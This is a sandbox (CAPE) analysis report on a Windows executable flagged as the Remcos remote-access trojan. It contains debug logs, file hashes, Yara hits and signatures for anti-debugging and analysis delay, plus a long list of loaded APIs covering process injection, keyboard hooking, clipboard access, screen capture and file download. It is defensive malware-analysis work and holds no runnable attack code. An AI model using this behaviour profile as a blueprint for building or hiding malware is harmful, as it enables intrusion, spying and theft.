2020-03-24 10:16:39,661 [root] DEBUG: Module image dump success C:\uGrmFZ\CAPE\1540_56812516235161024232020
2020-03-24 10:16:39,676 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x430ffc, size: 0x320
2020-03-24 10:16:39,676 [root] DEBUG: IAT parsing finished, found 189 valid APIs, missed 0 APIs
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: psapi.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: rpcrt4.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: wintrust.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: iertutil.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:16:39,739 [root] DEBUG: Adding module to module list: ole32.dll
2020-03-24 10:16:39,739 [root] DEBUG: Adding module to module list: urlmon.dll
2020-03-24 10:16:39,739 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:16:39,753 [root] DEBUG: Successfully built new import table, saving fixed file to disk.
2020-03-24 10:16:39,769 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1540_110768386439161024232020
2020-03-24 10:16:39,769 [root] DEBUG: Import table rebuild success.
2020-03-24 10:16:40,112 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1540.dmp.
2020-03-24 10:16:40,112 [lib.api.process] INFO: Termination confirmed for process 1540
2020-03-24 10:16:40,112 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1540
2020-03-24 10:16:40,112 [root] INFO: Terminate event set for process 1540.
2020-03-24 10:16:40,112 [root] INFO: Terminating process 1540 before shutdown.
2020-03-24 10:16:40,128 [root] INFO: Shutting down package.
2020-03-24 10:16:45,759 [lib.api.process] WARNING: Upload of memory dump for process 1540 failed.
2020-03-24 10:16:45,776 [root] INFO: Stopping auxiliary modules.
2020-03-24 10:16:45,776 [root] INFO: Finishing auxiliary modules.
2020-03-24 10:16:45,776 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 10:16:45,790 [root] WARNING: File at path "C:\uGrmFZ\debugger" does not exist, skip.
2020-03-24 10:16:45,790 [root] WARNING: Monitor injection attempted but failed for process 1380.
2020-03-24 10:16:45,790 [root] WARNING: Monitor injection attempted but failed for process 2788.
2020-03-24 10:16:45,790 [root] INFO: Analysis completed.

MalScore

10.0

Remcos

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 10:13:01 2020-03-24 10:17:15

File Details

File Name 0dc4c453de0a35cbb20a981abf0188cb6a68c0c157dec00c0ff78a880be9e1d2
File Size 1510412 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 363fdee4d80b4995d2154c30b5cdb7df
SHA1 f6d4ba9ca21aecdef07f4179fa502a4189abd83d
SHA256 0dc4c453de0a35cbb20a981abf0188cb6a68c0c157dec00c0ff78a880be9e1d2
SHA512 66e4e85048be76ef86757d3c660b7e4fa548c7b40286e5d0c5db3d7a730f181992402e5a17d9557f6cc64fc3ed461812d3790c15a82e3e5d0862ebbdf4834c35
CRC32 B768E3F6
Ssdeep 24576:piCHzdM5WwUV9TKowNux2kbd48YUpdXtFoLcAngZG0pI4cDvXnN1moajOmABsvWc:piBUZ
TrID
  • 68.2% (.EXE) Win32 Executable Borland Delphi 7 (664796/42/58)
  • 26.9% (.EXE) Win32 Executable Borland Delphi 6 (262638/61)
  • 1.4% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 1.3% (.SCR) Windows screen saver (13101/52/3)
  • 0.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
ClamAV None matched
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 trigged the Yara rule 'vmdetect'
Hit: PID 0 trigged the Yara rule 'embedded_win_api'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: iz3Ehm6t.exe, PID 1964
A process attempted to delay the analysis task.
Process: ieinstal.exe tried to sleep 333 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: USER32.dll/SetLayeredWindowAttributes
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/InterlockedDecrement
DynamicLoader: kernel32.dll/InterlockedIncrement
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/GetThreadLocale
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetCommandLineA
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/UnhandledExceptionFilter
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/RtlUnwind
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: USER32.dll/GetKeyboardType
DynamicLoader: USER32.dll/LoadStringA
DynamicLoader: USER32.dll/MessageBoxA
DynamicLoader: USER32.dll/CharNextA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: oleaut32.dll/SysFreeString
DynamicLoader: oleaut32.dll/SysReAllocStringLen
DynamicLoader: oleaut32.dll/SysAllocStringLen
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/TlsFree
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegFlushKey
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/SizeofResource
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/ReadProcessMemory
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/LockResource
DynamicLoader: kernel32.dll/LoadResource
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/GetThreadLocale
DynamicLoader: kernel32.dll/GetStringTypeExA
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetFullPathNameA
DynamicLoader: kernel32.dll/GetFileAttributesA
DynamicLoader: kernel32.dll/GetExitCodeThread
DynamicLoader: kernel32.dll/GetDiskFreeSpaceA
DynamicLoader: kernel32.dll/GetDateFormatA
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/GetCPInfo
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/FormatMessageA
DynamicLoader: kernel32.dll/FindResourceA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToDosDateTime
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/EnumCalendarInfoA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/CopyFileA
DynamicLoader: kernel32.dll/CompareStringA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: USER32.dll/MessageBoxA
DynamicLoader: USER32.dll/LoadStringA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CharNextA
DynamicLoader: USER32.dll/CharToOemA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: oleaut32.dll/SafeArrayPtrOfIndex
DynamicLoader: oleaut32.dll/SafeArrayGetUBound
DynamicLoader: oleaut32.dll/SafeArrayGetLBound
DynamicLoader: oleaut32.dll/SafeArrayCreate
DynamicLoader: oleaut32.dll/VariantChangeType
DynamicLoader: oleaut32.dll/VariantCopy
DynamicLoader: oleaut32.dll/VariantClear
DynamicLoader: oleaut32.dll/VariantInit
DynamicLoader: shell32.dll/ShellExecuteA
DynamicLoader: URLMON.DLL/URLDownloadToFileA
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: DUser.dll/InvalidateGadget
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/IsBadReadPtr
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/SizeofResource
DynamicLoader: kernel32.dll/LockResource
DynamicLoader: kernel32.dll/LoadResource
DynamicLoader: kernel32.dll/FindResourceA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetTempFileNameW
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/SetThreadContext
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/ReadProcessMemory
DynamicLoader: kernel32.dll/GetThreadContext
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/AllocConsole
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/MapViewOfFileEx
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/GetLogicalDriveStringsA
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/GetDriveTypeA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/CreatePipe
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/PeekNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/AppendMenuA
DynamicLoader: USER32.dll/RegisterClassExA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/SendInput
DynamicLoader: USER32.dll/mouse_event
DynamicLoader: USER32.dll/GetIconInfo
DynamicLoader: USER32.dll/DrawIcon
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: USER32.dll/IsWindowVisible
DynamicLoader: USER32.dll/CloseWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetKeyboardLayoutNameA
DynamicLoader: USER32.dll/MessageBoxW
DynamicLoader: USER32.dll/ExitWindowsEx
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/CreatePopupMenu
DynamicLoader: USER32.dll/ShowWindow
DynamicLoader: USER32.dll/SetWindowTextW
DynamicLoader: USER32.dll/SetForegroundWindow
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/UnhookWindowsHookEx
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/GetWindowTextLengthA
DynamicLoader: USER32.dll/GetWindowTextA
DynamicLoader: USER32.dll/GetKeyState
DynamicLoader: USER32.dll/CallNextHookEx
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/GetKeyboardLayout
DynamicLoader: USER32.dll/GetMessageA
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/TrackPopupMenu
DynamicLoader: USER32.dll/GetCursorPos
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/DispatchMessageA
DynamicLoader: GDI32.dll/CreateDCA
DynamicLoader: GDI32.dll/CreateCompatibleDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: GDI32.dll/CreateCompatibleBitmap
DynamicLoader: GDI32.dll/DeleteDC
DynamicLoader: GDI32.dll/DeleteObject
DynamicLoader: GDI32.dll/SelectObject
DynamicLoader: GDI32.dll/GetDIBits
DynamicLoader: GDI32.dll/GetObjectA
DynamicLoader: GDI32.dll/StretchBlt
DynamicLoader: ADVAPI32.dll/RegDeleteKeyA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: ADVAPI32.dll/ChangeServiceConfigW
DynamicLoader: ADVAPI32.dll/QueryServiceStatus
DynamicLoader: ADVAPI32.dll/ControlService
DynamicLoader: ADVAPI32.dll/OpenSCManagerW
DynamicLoader: ADVAPI32.dll/StartServiceW
DynamicLoader: ADVAPI32.dll/OpenSCManagerA
DynamicLoader: ADVAPI32.dll/EnumServicesStatusW
DynamicLoader: ADVAPI32.dll/OpenServiceW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyW
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/CloseServiceHandle
DynamicLoader: ADVAPI32.dll/QueryServiceConfigW
DynamicLoader: SHELL32.dll/ExtractIconA
DynamicLoader: SHELL32.dll/Shell_NotifyIconA
DynamicLoader: SHELL32.dll/ShellExecuteExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/??1type_info@@UAE@XZ
DynamicLoader: msvcrt.dll/_onexit
DynamicLoader: msvcrt.dll/__dllonexit
DynamicLoader: msvcrt.dll/_iob
DynamicLoader: msvcrt.dll/freopen
DynamicLoader: msvcrt.dll/wcscat
DynamicLoader: msvcrt.dll/_itow
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wsystem
DynamicLoader: msvcrt.dll/wcscpy
DynamicLoader: msvcrt.dll/wcslen
DynamicLoader: msvcrt.dll/_wgetenv
DynamicLoader: msvcrt.dll/toupper
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/tolower
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/_wrename
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/getenv
DynamicLoader: msvcrt.dll/printf
DynamicLoader: msvcrt.dll/strncmp
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/free
DynamicLoader: msvcrt.dll/_EH_prolog
DynamicLoader: msvcrt.dll/__CxxFrameHandler
DynamicLoader: msvcrt.dll/??3@YAXPAX@Z
DynamicLoader: msvcrt.dll/_CxxThrowException
DynamicLoader: msvcrt.dll/??0exception@@QAE@ABV0@@Z
DynamicLoader: msvcrt.dll/time
DynamicLoader: msvcrt.dll/localtime
DynamicLoader: msvcrt.dll/strftime
DynamicLoader: msvcrt.dll/atoi
DynamicLoader: msvcrt.dll/_ftol
DynamicLoader: msvcrt.dll/??2@YAPAXI@Z
DynamicLoader: msvcrt.dll/swprintf
DynamicLoader: msvcrt.dll/_itoa
DynamicLoader: MSVCP60.dll/??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z
DynamicLoader: MSVCP60.dll/?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z
DynamicLoader: MSVCP60.dll/??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
DynamicLoader: MSVCP60.dll/??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
DynamicLoader: MSVCP60.dll/??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
DynamicLoader: MSVCP60.dll/??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
